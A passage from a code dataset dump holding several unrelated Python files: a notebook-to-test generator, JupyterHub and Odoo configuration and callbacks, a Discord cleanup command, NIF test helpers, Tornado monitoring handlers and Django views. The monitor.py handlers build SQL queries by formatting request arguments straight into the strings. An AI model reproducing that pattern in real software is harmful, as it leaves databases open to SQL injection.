shlex.split(params_string_), self.accepted[\"params\"])\n control_params_d[cell_index].update(params_d)\n\n if update:\n self.code_d_ = clean_code_d\n\n self.control_params_d.update(control_params_d)\n return self.control_params_d\n\n def carve_setup(self, update=True):\n \"\"\"Get setup code.\"\"\"\n setup_code_l = []\n clean_code_d = {}\n for cell_index, cell in self.code_d_.items():\n if \"setup\" in self.control_params_d[cell_index]:\n setup_code_l.append(cell.strip())\n else:\n clean_code_d[cell_index] = cell\n setup_code = \"\\n\".join(setup_code_l)\n\n logger.debug(\"setUp code: %s\", setup_code)\n if update:\n self.code_d_ = clean_code_d\n self.replacements[\"setup\"] = setup_code\n return setup_code, clean_code_d\n\n def remove_backslash(self, update=True):\n \"\"\"Remove backslash at the end of the line.\"\"\"\n # TODO(NikZak) for \\ inside \"\"\" or inside a comment, redo with tokenizer\n clean_code_d = {}\n for index, cell in self.code_d_.items():\n if cell:\n cell_source = re.sub(r\"\\\\\\n\\s*\", \" \", cell)\n clean_code_d[index] = cell_source\n if update:\n self.code_d_ = clean_code_d\n return clean_code_d\n\n def carve_imports(self, update=True):\n \"\"\"Get imports code.\"\"\"\n # assemble import code\n import_tokens = []\n clean_code_d_ = {}\n for cell_index, cell in self.code_d_.items():\n if \"ignore\" in self.control_params_d[cell_index]:\n continue\n\n # find imports\n tokens = [(x[0], x[1]) for x in _tokenize(cell)]\n logger.debug(\"Tokens: %s\", tokens)\n tokens_clean = []\n start_import_line = None\n\n for index, token in enumerate(tokens):\n if start_import_line is not None:\n if token[0] == NEWLINE:\n import_tokens += tokens[start_import_line:index] + [(NEWLINE, '\\n')]\n logger.debug(\"Added imports: %s\",\n tokens[start_import_line:index] + [(NEWLINE, '\\n')])\n start_import_line = None\n continue\n else:\n if token[0] == NAME and (token[1] == \"import\" or token[1] == \"from\"):\n start_import_line = index\n logger.debug(\"Started import line: %d\", start_import_line)\n else:\n tokens_clean.append(token)\n clean_code_d_[cell_index] = untokenize(tokens_clean)\n\n # add imports with no indentation\n import_code = untokenize(import_tokens)\n logger.debug(\"import_code: %s\", import_code)\n\n # remove duplicates\n import_code_l = import_code.split(\"\\n\")\n import_code_l = list(dict.fromkeys(import_code_l))\n import_code = \"\\n\".join(import_code_l)\n\n logger.debug(\"imports code: %s\", import_code)\n\n if update:\n self.code_d_ = clean_code_d_\n self.replacements[\"imports\"] = import_code\n return import_code, clean_code_d_\n\n def run(self):\n \"\"\"Run in correct order.\"\"\"\n self.remove_backslash()\n self.carve_magic()\n self.carve_control_params()\n self.carve_imports()\n self.carve_setup()\n self.make_tests()\n\n def apply_callbacks(self, output_string, callbacks):\n \"\"\"Apply callbacks.\"\"\"\n for callback in callbacks:\n if callback not in [x[0] for x in self.accepted[\"callbacks\"]]:\n logger.error(\"Uknonwn callback %s\", callback)\n continue\n if callback == \"isort\":\n import isort # pylint: disable=import-outside-toplevel\n output_string = isort.code(output_string) # pylint: disable=import-outside-toplevel\n if callback == \"black\":\n from black import format_str, FileMode # pylint: disable=import-outside-toplevel\n output_string = format_str(output_string, mode=FileMode())\n if callback == \"yapf\":\n from yapf.yapflib.yapf_api import FormatCode # pylint: disable=import-outside-toplevel\n from yapf.yapflib import file_resources # pylint: disable=import-outside-toplevel\n style_config = file_resources.GetDefaultStyleForDir(os.getcwd())\n\n output_string = FormatCode(output_string, style_config=style_config)\n # yapf<0.3 returns diff as str, >=0.3 returns a tuple of (diff, changed)\n output_string = output_string[0] if isinstance(output_string,\n tuple) else output_string\n return output_string\n\n def check_cells(self, index_iter):\n \"\"\"Check that the cell code respects control params.\"\"\"\n if \"ignore\" in self.control_params_d[index_iter]:\n return False\n ops = [x[0] for x in _tokenize(self.code_d_[index_iter])]\n if OP not in ops and NAME not in ops:\n #code should do at least something meaningful\n return False\n return True\n\n def check_cells_if(self, index_iter, control_line=None):\n \"\"\"Check that the cell code respects control params.\"\"\"\n if control_line is None:\n control_line = []\n for check in control_line:\n check_l = check.split(\" \")\n if check_l[0] == \"not\" and len(check_l) > 1:\n check = \" \".join(check_l[1:])\n if check not in self.accepted[\"params\"]:\n logger.error(\"Unknown param: %s in template.py. Ignoring\", check)\n if check in self.control_params_d[index_iter]:\n return False\n else:\n if check not in self.control_params_d[index_iter]:\n return False\n return True\n\n def check_head_if(self, control_line=None):\n \"\"\"Check that the cell code respects control params.\"\"\"\n if control_line is None:\n control_line = []\n for check in control_line:\n check_l = check.split(\" \")\n if check_l[0] == \"not\" and len(check_l) > 1:\n check = \" \".join(check_l[1:])\n if check in self.control_params_d[\"head_level\"]:\n return False\n else:\n if check not in self.control_params_d[\"head_level\"]:\n return False\n return True\n\n def make_tests_iter(self, templ_, output_string, cell_index=None):\n \"\"\"Walk iteratively through the template.\"\"\"\n for _, code_piece in sorted(templ_.items()):\n if \"control\" in code_piece:\n if \"if_head_level\" in code_piece[\"control\"]:\n if not self.check_head_if(code_piece[\"control\"][\"if_head_level\"]):\n continue\n if \"if_cell_level\" in code_piece[\"control\"]:\n if cell_index and not self.check_cells_if(\n cell_index, code_piece[\"control\"][\"if_cell_level\"]):\n continue\n if \"loop\" in code_piece[\"control\"]:\n templ_piece = code_piece[\"source\"]\n for index_iter, value_iter in self.__dict__[code_piece[\"control\"]\n [\"loop\"]].items():\n self.replacements[\"index_iter\"] = index_iter\n self.replacements[\"index_iter_name\"] = str(index_iter).zfill(5)\n self.replacements[\"value_iter\"] = value_iter\n if \"comment\" in self.control_params_d[index_iter]:\n\n self.replacements[\"comment\"] = self.control_params_d[index_iter][\n \"comment\"].replace('\"', '\\\\\"')\n self.replacements[\n \"ct_saved_cell_outputs_stdout\"] = self.ct_saved_cell_outputs[\n index_iter][\"stdout\"]\n self.replacements[\n \"ct_saved_cell_outputs_stderr\"] = self.ct_saved_cell_outputs[\n index_iter][\"stderr\"]\n self.replacements[\n \"ct_saved_cell_outputs_display_data\"] = self.ct_saved_cell_outputs[\n index_iter][\"display_data\"]\n self.replacements[\"run_all_till_now\"] = (\n self.replacements[\"setup\"] +\n \"\".join(value for key, value in self.code_d_.items()\n if key < index_iter))\n\n if not self.check_cells(index_iter):\n continue\n output_string = self.make_tests_iter(\n templ_piece, output_string, cell_index=index_iter)\n continue\n\n code_formatted = code_piece[\"source\"]\n\n if \"replacements\" in code_piece:\n replacements = [\n self.replacements[x] for x in code_piece[\"replacements\"]\n ]\n code_formatted = code_formatted.format(*replacements)\n\n if \"callbacks\" in code_piece:\n for callback in code_piece[\"callbacks\"]:\n if callback == \"replace_asserts\":\n code_formatted = replace_asserts(code_formatted)\n if callback == \"save_outputs\":\n code_formatted = save_outputs(code_formatted)\n\n if \"indent\" in code_piece:\n code_formatted = indent(code_formatted, count=code_piece[\"indent\"])\n\n output_string = glue(output_string, code_formatted)\n\n return output_string\n\n def make_tests(self, update=True, callbacks=None, insert_saved_outputs=None):\n \"\"\"Assemle test file.\"\"\"\n if callbacks is None:\n callbacks = self.kwargs[\"callbacks\"]\n if insert_saved_outputs is None:\n insert_saved_outputs = self.kwargs[\"insert_saved_outputs\"]\n output_string = \"\"\n output_string = self.make_tests_iter(self.templ, output_string)\n\n if callbacks:\n output_string = self.apply_callbacks(output_string, callbacks)\n\n logger.debug(output_string)\n\n # Writing to file\n if update:\n with open(self.output, \"w\") as file1:\n file1.write(output_string)\n return output_string\n","sub_path":"src/celltest/cells.py","file_name":"cells.py","file_ext":"py","file_size_in_byte":15117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"160602515","text":"# dummy for testing. Don't use this in production!\n#c.JupyterHub.authenticator_class = 'dummyauthenticator.DummyAuthenticator'\n\n# launch with docker\nc.JupyterHub.spawner_class = 'dockerspawner.DockerSpawner'\n\n# we need the hub to listen on all ips when it is in a container\nc.JupyterHub.hub_ip = '0.0.0.0'\n# the hostname/ip that should be used to connect to the hub\n# this is usually the hub container's name\nc.JupyterHub.hub_connect_ip = 'jupyterhub_basic'\n\n# pick a docker image. This should have the same version of jupyterhub\n# in it as our Hub.\nc.DockerSpawner.image = 'phaustin/notebook:step1'\nnotebook_dir = \"/home/jovyan/work\"\nc.DockerSpawner.notebook_dir = notebook_dir\n\n# tell the user containers to connect to our docker network\nc.DockerSpawner.network_name = 'net_basic'\nc.DockerSpawner.volumes = {\"jupyterhub-user-{username}\": notebook_dir}\n# delete containers when the stop\nc.DockerSpawner.remove = True\n\n# Github OAuth\nfrom oauthenticator.github import GitHubOAuthenticator\nc.JupyterHub.authenticator_class = GitHubOAuthenticator\nc.GitHubOAuthenticator.allowed_organizations = ['eoas-ubc-github-shared-test']\n\n# Load users from access list\nimport os\n\nc.Authenticator.whitelist = whitelist = set()\nc.Authenticator.admin_users = admin = set()\n\njoin = os.path.join\nhere = os.path.dirname(__file__)\nwith open(join(here, 'userlist')) as f:\n for line in f:\n if not line:\n continue\n parts = line.split()\n name = parts[0]\n whitelist.add(name)\n if len(parts) > 1 and parts[1] == 'admin':\n admin.add(name)\n\n","sub_path":"examples/github-oauth-users-limit/hub_image/jupyterhub_config.py","file_name":"jupyterhub_config.py","file_ext":"py","file_size_in_byte":1572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"165255210","text":"# -*- coding: utf-8 -*-\r\n\r\nimport json\r\nimport logging\r\nimport xml.etree.cElementTree as ET\r\nimport sys\r\nfrom odoo.addons.wecom_api.api.wecom_msg_crtpt import WecomMsgCrypt\r\nfrom odoo import http, models, fields, _\r\nfrom odoo.http import request\r\n\r\n\r\nclass StripeController(http.Controller):\r\n \"\"\"\r\n \"\"\"\r\n\r\n @http.route(\r\n [\"/wecom_callback\", \"/wecom_callback/\"],\r\n type=\"http\",\r\n auth=\"public\",\r\n methods=[\"GET\", \"POST\"],\r\n )\r\n def WecomCallbackService(self):\r\n \"\"\"\r\n 企业微信回调服务\r\n \"\"\"\r\n\r\n @http.route(\r\n [\"/wecom_callback//\", \"/wecom_callback/contacts\"],\r\n type=\"http\",\r\n auth=\"public\",\r\n methods=[\"GET\", \"POST\"],\r\n )\r\n def WecomCallbackService(self, service, id, **kw):\r\n \"\"\"\r\n 企业微信回调服务\r\n :param id: 公司id\r\n :param service:回调服务名称 code \r\n \"\"\"\r\n company_id = request.env[\"res.company\"].sudo().search([(\"id\", \"=\", id)])\r\n corpid = company_id.corpid\r\n\r\n if request.httprequest.method == \"GET\":\r\n app = (\r\n request.env[\"wecom.apps\"]\r\n .sudo()\r\n .search([(\"company_id\", \"=\", id), (\"code\", \"=\", service)])\r\n )\r\n\r\n wxcpt = WecomMsgCrypt(app.callback_url_token, app.callback_aeskey, corpid)\r\n\r\n msg_signature = kw[\"msg_signature\"]\r\n timestamp = kw[\"timestamp\"]\r\n nonce = kw[\"nonce\"]\r\n echostr = kw[\"echostr\"]\r\n\r\n ret, sEchoStr = wxcpt.VerifyURL(msg_signature, timestamp, nonce, echostr)\r\n if ret != 0:\r\n # print(\"ERR: VerifyURL ret: \" + str(ret))\r\n logging.error(\"ERR: VerifyURL ret: \" + str(ret))\r\n sys.exit(1)\r\n return sEchoStr\r\n\r\n if request.httprequest.method == \"POST\":\r\n pass\r\n","sub_path":"wecom_api/controllers/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"510579153","text":"# import discord\nfrom discord.ext import commands\n\nfrom bot import BotBase, Context\n\n\nclass Moderation(commands.Cog):\n\n def __init__(self, bot: BotBase):\n self.bot = bot\n\n @commands.command(name='cleanup')\n @commands.check_any(commands.has_guild_permissions(manage_messages=True), commands.is_owner())\n async def cleanup(self, ctx: Context, limit: int = 50):\n \"\"\"Deletes messages related to bot commands from the channel.\n\n `limit`: the number of messages to process, can be a maximum of 100 messages.\n \"\"\"\n to_delete = []\n\n if not 0 < limit <= 100:\n raise commands.BadArgument('You can only delete between 1 and 100 messages.')\n\n async for message in ctx.channel.history(limit=limit):\n\n context = await self.bot.get_context(message)\n if message.author == self.bot.user:\n to_delete.append(message)\n\n if ctx.me.permissions_in(ctx.channel).manage_messages and context.command is not None:\n to_delete.append(message)\n\n await ctx.send(f'Deleted {len(to_delete)} messages', delete_after=5)\n\n if ctx.me.permissions_in(ctx.channel).manage_messages:\n await ctx.channel.delete_messages(to_delete)\n else:\n for message in to_delete:\n await message.delete(silent=True)\n\n\ndef setup(bot: BotBase):\n bot.add_cog(Moderation(bot))\n","sub_path":"cogs/moderation.py","file_name":"moderation.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"327790531","text":"# ***** BEGIN LICENSE BLOCK *****\n# \n# Copyright © 2005-2013, NIF File Format Library and Tools contributors.\n# All rights reserved.\n# \n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions\n# are met:\n# \n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# \n# * Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following\n# disclaimer in the documentation and/or other materials provided\n# with the distribution.\n# \n# * Neither the name of the NIF File Format Library and Tools\n# project nor the names of its contributors may be used to endorse\n# or promote products derived from this software without specific\n# prior written permission.\n# \n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\n# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE\n# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,\n# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\n# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\n# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN\n# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n#\n# ***** END LICENSE BLOCK *****\n\nimport nose\n\nfrom pyffi.utils.withref import ref\nfrom pyffi.formats.nif import NifFormat\n\ndef n_attach_specular_prop(n_trishapedata):\n '''Attaches a NiSpecularProperty to a trishapedata block property's array at pos[0]'''\n \n n_nispecularprop = NifFormat.NiSpecularProperty()\n n_nispecularprop.flags = 0x1\n \n # add property to top of list\n n_trishapedata.properties.reverse()\n\n n_trishapedata.num_properties += 1\n n_trishapedata.properties.update_size()\n n_trishapedata.properties[-1] = n_nispecularprop\n\n n_trishapedata.properties.reverse()\n \ndef n_alter_material_specular(n_nimaterialprop):\n with ref(n_nimaterialprop.specular_color) as n_color3:\n n_color3.r = 0.5\n n_color3.g = 0.0\n n_color3.b = 0.0\n \ndef n_check_material_specular(n_mat_prop):\n nose.tools.assert_equal((n_mat_prop.specular_color.r,\n n_mat_prop.specular_color.g,\n n_mat_prop.specular_color.b),\n (0.5,0.0,0.0))\n \ndef n_check_specular_block(n_mat_prop):\n nose.tools.assert_is_instance(n_mat_prop, NifFormat.NiSpecularProperty)\n\ndef n_check_specular_property(n_specular_prop):\n nose.tools.assert_equal(n_specular_prop.flags, 0x1)\n","sub_path":"testframework/integration/property/specular/n_gen_specular.py","file_name":"n_gen_specular.py","file_ext":"py","file_size_in_byte":2982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"476590963","text":"#!coding=utf-8\r\nfrom mvc import *\r\nfrom utility import ActionHandler\r\nfrom bson import ObjectId\r\nfrom mvc import mongo_util\r\nfrom mvc import mysql_util\r\nimport hashlib\r\nfrom logic import manage\r\nfrom logic.define import *\r\n\r\n\r\n@url(r\"/monitor\")\r\nclass MonitorHandler(ActionHandler):\r\n def get(self):\r\n substid = self.get_argument('substid')\r\n subst = manage.get_subst_info(substid = substid)\r\n self.render(\"monitor.html\", substid = substid, subst = subst)\r\n\r\n@url(r\"/monitor/ERC\")\r\nclass MonitorERCHandler(ActionHandler):\r\n def get(self):\r\n substid = self.get_argument('substid')\r\n subst = manage.get_subst_info(substid = substid)\r\n eu = manage.get_eu_info(substid)\r\n\r\n jqr_event = []\r\n for e in eu:\r\n euaddr = e.get('euaddr')\r\n fields = ['ERC_ID', 'euaddr', 'HappenTime', 'Note', 'Content']\r\n sql = \"select {} from JQR_EVENT_ERC where euaddr='{}' and DealWith=0 order by HappenTime DESC\".format(','.join(fields), euaddr)\r\n data, t = mysql_util.m_query(sql, fields, findall=True)\r\n if not data:\r\n data = [{'ERC_ID': 1, 'euaddr': '0000000100000001', 'HappenTime': 'HappenTime', 'Note': 'Note', 'Content': 'Content'},\r\n {'ERC_ID': 2, 'euaddr': '0000000100000001', 'HappenTime': 'HappenTime', 'Note': 'Note', 'Content': 'Content'}]\r\n\r\n for d in data:\r\n d['name'] = e.get('name')\r\n d['HappenTime'] = str(d.get('HappenTime'))\r\n\r\n jqr_event.extend(data)\r\n\r\n fields = ['ERC_ID', 'PointID', 'HappenTime', 'Note', 'Content']\r\n sql = \"select {} from YW_EVENT_ERC where substid='{}' and DealWith=0 order by HappenTime DESC\".format(','.join(fields), substid)\r\n yw_event, t = mysql_util.m_query(sql, fields, findall=True)\r\n\r\n if not yw_event:\r\n yw_event = [{'PointID':'1', 'HappenTime': '2', 'Note': '5', 'Content':'4'}]\r\n\r\n self.write(dict(status = True, jqr_event = jqr_event, yw_event = yw_event))\r\n\r\n\r\nindex = 0\r\ndef get_index():\r\n global index;\r\n if index == 11:\r\n index = 1\r\n else:\r\n index += 1\r\n\r\n return index\r\n\r\n@url(r\"/monitor/eu\")\r\nclass MonitorTermHandler(ActionHandler):\r\n def get(self):\r\n road = self.get_argument('road', None)\r\n substid = self.get_argument('substid')\r\n subst = manage.get_subst_info(substid = substid)\r\n m, mapinfo = manage.get_map_info_by_substid(substid)\r\n eu = manage.get_eu_info(substid)\r\n\r\n data = []\r\n for e in eu:\r\n euaddr = e.get('euaddr')\r\n fields = ['EuAddr', 'CollectTime', 'SchemeNum', 'PlanNum', 'MeasuNum', 'JqrTime', 'BatteryCapat', 'BatteryVar', 'JqrConMode', 'LocalTemp', 'LocalHum', 'LocalWind', 'SysTemp', 'JqrSpeed', 'CurrentPoint', 'CurrentPointLog', 'FrontPoint', 'FrontPointLog']\r\n\r\n sql = \"select {} from TermRealTimeShowData where euaddr='{}'\".format(','.join(fields), euaddr)\r\n d, t = mysql_util.m_query(sql, fields, findall=True)\r\n for _d in d:\r\n if road:\r\n _d['CurrentPoint'] = get_index()\r\n _d['name'] = e.get('name')\r\n data.extend(d)\r\n\r\n self.write(dict(status = True, data = data, mapinfo = mapinfo))\r\n\r\n\r\n@url(r\"/monitor/ERC/history\")\r\nclass MonitorERCHistoryHandler(ActionHandler):\r\n def get(self):\r\n substid = self.get_argument('substid')\r\n subst = manage.get_subst_info(substid = substid)\r\n eu = manage.get_eu_info(substid)\r\n\r\n EVENT = []\r\n for e in eu:\r\n euaddr = e.get('euaddr')\r\n euaddr = '1' * 24\r\n fields = ['euaddr', 'HappenTime', 'Note', 'Content', 'DealWith']\r\n sql = \"select {} from JQR_EVENT_ERC where euaddr='{}' order by HappenTime DESC\".format(','.join(fields), euaddr)\r\n data, t = mysql_util.m_query(sql, fields, findall=True)\r\n\r\n for d in data:\r\n d['name'] = e.get('name')\r\n\r\n EVENT.extend(data)\r\n\r\n fields = ['pointid', 'HappenTime', 'Note', 'Content']\r\n sql = \"select {} from YW_EVENT_ERC where substid='{}' and DealWith=0 order by HappenTime DESC\".format(','.join(fields), substid)\r\n data, t = mysql_util.m_query(sql, fields, findall=True)\r\n\r\n EVENT.extend(data)\r\n\r\n self.render(\"erc_history.html\", data = EVENT)\r\n\r\n@url(r\"/monitor/ERC/dealwith\")\r\nclass MonitorERCDealWithHandler(ActionHandler):\r\n def post(self):\r\n ERC_ID = self.get_argument('ERC_ID')\r\n flag = self.get_argument('flag')\r\n\r\n if flag == 'JQR':\r\n sql = \"update JQR_EVENT_ERC set DealWith=1 where ERC_ID={}\".format(ERC_ID)\r\n mysql_util.m_execute(sql)\r\n else:\r\n sql = \"update YW_EVENT_ERC set DealWith=1 where ERC_ID={}\".format(ERC_ID)\r\n mysql_util.m_execute(sql)\r\n\r\n\r\n self.write(dict(status = True))\r\n\r\n","sub_path":"action/monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":4940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"258325763","text":"#!/usr/bin/env python2\n# OpenPOWER Automated Test Project\n#\n# Contributors Listed Below - COPYRIGHT 2018\n# [+] International Business Machines Corp.\n#\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied. See the License for the specific language governing\n# permissions and limitations under the License.\n#\n\n\nimport unittest\nimport os\n\nimport OpTestConfiguration\nfrom common.OpTestSystem import OpSystemState\n\n\nclass RunHostTest(unittest.TestCase):\n def setUp(self):\n self.conf = OpTestConfiguration.conf\n self.system = self.conf.system()\n self.host_cmd = self.conf.args.host_cmd\n self.host_cmd_file = self.conf.args.host_cmd_file\n self.host_cmd_timeout = self.conf.args.host_cmd_timeout\n if not (self.host_cmd or self.host_cmd_file):\n self.fail(\"Provide either --host-cmd and --host-cmd-file option\")\n\n def runTest(self):\n self.system.goto_state(OpSystemState.OS)\n con = self.system.sys_get_ipmi_console()\n self.system.host_console_login()\n self.system.host_console_unique_prompt()\n if self.host_cmd:\n con.run_command(self.host_cmd, timeout=self.host_cmd_timeout)\n if self.host_cmd_file:\n if not os.path.isfile(self.host_cmd_file):\n self.fail(\"Provide valid host cmd file path\")\n fd = open(self.host_cmd_file, \"r\")\n for line in fd.readlines():\n line = line.strip()\n if \"reboot\" in line:\n self.system.goto_state(OpSystemState.OFF)\n self.system.goto_state(OpSystemState.OS)\n con = self.system.sys_get_ipmi_console()\n self.system.host_console_login()\n self.system.host_console_unique_prompt()\n continue\n con.run_command(line, timeout=self.host_cmd_timeout)\n","sub_path":"testcases/RunHostTest.py","file_name":"RunHostTest.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"61495680","text":"import sys, crowdlib as cl, crowdlib_settings\n\nhit_type = cl.create_hit_type(title=\"Find the answer to a trivia question.\",\n\treward=0.10, description=\"Search online for the answer to a question.\")\n\ncmd = sys.argv[1]\n\nif cmd==\"post\":\n\thit = hit_type.create_hit(\"http://alexquinn.org/amt/zipper.html\", 400)\n\thit_type.preview_in_browser()\n\nelif cmd==\"fetch\":\n\tfor asg in hit_type.assignments:\n\t\tprint( \" Submitted %s by %s on %s\"%(asg.submit_time, asg.worker.id,\n\t\t\t\t\t\t\t\t\t\t\t\t\tasg.hit.hit_type.title) )\n\t\tfor answer in asg.answers:\n\t\t\tprint( \" %s : %s\"%(answer.question_id, answer.text) )\n\nelif cmd==\"cancel\":\n\thit_type.is_available = False\n","sub_path":"examples/minimal_external.py","file_name":"minimal_external.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"290711150","text":"#### Create your views here. ####\nfrom django.shortcuts import render,redirect,render_to_response\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.urls import reverse\nfrom misitio.ai.forms import CuidadoresForm\nfrom misitio.ai.forms import ApoderadosForm\nfrom misitio.ai.forms import PacientesForm\nfrom misitio.ai.forms import ParamForm\nfrom misitio.ai.forms import PautaForm\nfrom misitio.ai.forms import ResupautaForm\nfrom misitio.ai.forms import DetapautaForm\nfrom misitio.ai.forms import AnticiposForm\nfrom misitio.ai.forms import Pauta_auxForm\nfrom misitio.ai.forms import Pacientes_auxForm\nfrom misitio.ai.forms import RecetaForm,MaefarmForm\n\nfrom misitio.ai.models import Cuidadores,Pacientes,Apoderados,Detapauta\nfrom misitio.ai.models import Param,Pauta,Resupauta\nfrom misitio.ai.models import Anticipos,Pauta_aux,Pagocui_aux\nfrom misitio.ai.models import Pacientes_aux \nfrom misitio.ai.models import Mensual_aux \nfrom misitio.ai.models import Diario_aux,Saldos,Receta,Maefarm\nfrom misitio.ai.misfunciones import anticipos,preparadia,boleta,saldoant,fecha_actual \nfrom misitio.ai.misfunciones import nombrearch,fecha_palabra,nturnos,grabasaldo\nfrom misitio.ai.misfunciones import edad,fecha_ddmmaaaa\n\nfrom django.shortcuts import get_list_or_404, get_object_or_404\n\nfrom django.views.generic import TemplateView\nfrom django.db.models import Q\nfrom django.contrib import messages,auth\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.models import User\nfrom django.http import JsonResponse\nimport os, sys,shutil\nfrom os import remove\nfrom os import scandir, getcwd,startfile\nfrom datetime import datetime,timedelta,date\nfrom django.db import DatabaseError, transaction\nfrom django.db import connection\nimport calendar\n\nimport openpyxl\nfrom openpyxl import Workbook\nfrom openpyxl.styles import Alignment,Border,Font,PatternFill,Side\nfrom openpyxl.styles import colors\nfrom openpyxl.styles import Font, Color,Fill\nfrom openpyxl.styles.borders import BORDER_THIN\nfrom openpyxl.drawing.image import Image as XLIMG\n\nfrom reportlab.pdfgen import canvas\nfrom reportlab.lib.pagesizes import letter\nfrom reportlab.platypus import Image\n\nfrom reportlab.lib import colors\nfrom reportlab.lib.colors import blue,white,black\nfrom reportlab.lib.units import inch, mm \nfrom reportlab.platypus import Paragraph \nfrom reportlab.lib.styles import ParagraphStyle \nfrom reportlab.lib.enums import TA_CENTER \nfrom reportlab.platypus.tables import TableStyle, Table\nfrom reportlab.platypus.doctemplate import SimpleDocTemplate\nfrom reportlab.platypus import Paragraph, Spacer\nfrom reportlab.lib import styles\nfrom io import BytesIO\nfrom reportlab.lib.enums import TA_JUSTIFY\nfrom reportlab.lib.styles import getSampleStyleSheet\nfrom reportlab.pdfbase.ttfonts import TTFont\n\nfrom tabulate import tabulate\n\nimport wget\nfrom PIL import Image\nfrom django.http import FileResponse, Http404\nimport getpass\nfrom getpass import getuser\nfrom misitio.ai.forms import UploadFileForm\n\nfrom django.utils.decorators import method_decorator\nfrom django.contrib.auth.decorators import login_required, permission_required\nfrom reportlab.platypus.flowables import Flowable\nfrom reportlab.lib.styles import getSampleStyleSheet\nimport csv,io\n#\n# para prueba\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.views.generic.edit import CreateView\n\n\n@login_required(login_url='log_out')\ndef principal(request):\n variable1 = 'PAGINA PRINCIPAL'\n logo = \"/static/img/Logo_AsistenciaIntegral.jpg\"\n #logo = \"/staticfiles/img/Logo_AsistenciaIntegral.jpg\" # for PythonAnyWhere\n context ={\"variable1\":variable1,\"logo_corp\":logo, }\n return render(request,'principal.html',context)\n\ndef login_ini2(request):\n return HttpResponse(\"!! Sistema momentaneamente en etapa de pruebas y avance de desarrollo!!\")\n\ndef login_ini(request):\n\tvariable1 = 'Pantalla de Acceso al Sistema'\n\terror_log = 'ok'\n\tusername = request.POST.get('username')\n\tpassword = request.POST.get('password') # valor del template\n\tuser = auth.authenticate(username=username, password=password)\n\tif request.method == \"POST\":\n\t\tif user is not None and user.is_active:\n\t\t\t# Correct password, and the user is marked \"active\"\n\t\t\tauth.login(request, user)\n\t\t\trequest.session['username_x'] = username # variable gobal\n\t\t\trequest.session['id_x'] = user.id \t# variable gobal\n\t\t\t#return HttpResponse(str(user.id))\n\t\t\treturn HttpResponseRedirect(\"principal\")\n\n\t\terror_log = \"error\"\n\t\t\n\tcontext ={\"variable1\":variable1,\"error_log\":error_log,}\n\treturn render(request,\"login_ini.html\",context)\n\tcontext ={\n\t\t\t'user':user,\n\t\t\t\"variable1\":variable1,\n\t\t\t\"error_log\":error_log,\n\t}\n\treturn render(request,'login_ini.html',context)\n\n\ndef log_out(request):\n\timport socket\t# ip de la maquina\n\tid_x = request.session.get('id_x')\t# nombre de la maquina\n\tip = socket.gethostname()\n\tequipo_ip = socket.gethostbyname(ip)\n\tequipo_remoto = equipo_ip+\" \"+ip\n\tlog_out_x = datetime.now()\n\tcursor = connection.cursor()\n\tcursor.execute(\n\t\t\"update auth_user set log_out=%s,equipo_remoto=%s where id=%s\",[log_out_x,equipo_remoto,id_x] # \n\t)\n\tlogout(request)\n\treturn redirect('login_ini')\n\n\ndef grid_cuidadores(request):\n\tvariable1 = 'Despliegue de Cuidadores'\n\tcuidador = Cuidadores.objects.all().exclude(rut='0-0').order_by('nombre')\n\tcuenta = cuidador.count()\n\tcontext = {\n\t\t\"cuidadores\":cuidador,\n\t\t\"variable1\":variable1,\n\t\t\"cuenta\":cuenta,}\n\treturn render(request,'grid_cuidadores.html',context)\n\n\ndef grid_apoderados(request):\n\tvariable1 = 'Despliegue de Apoderados e Instituciones'\n\tapoderado = Apoderados.objects.all().order_by('nombre')\n\tcontext = {\n\t\t\"apoderados\":apoderado,\n\t\t\"variable1\":variable1,\n\t}\n\treturn render(request,'grid_apoderados.html',context)\n\n\n@login_required(login_url='login_ini')\ndef grid_pacientes(request):\n\tvariable1 = 'Despliegue de 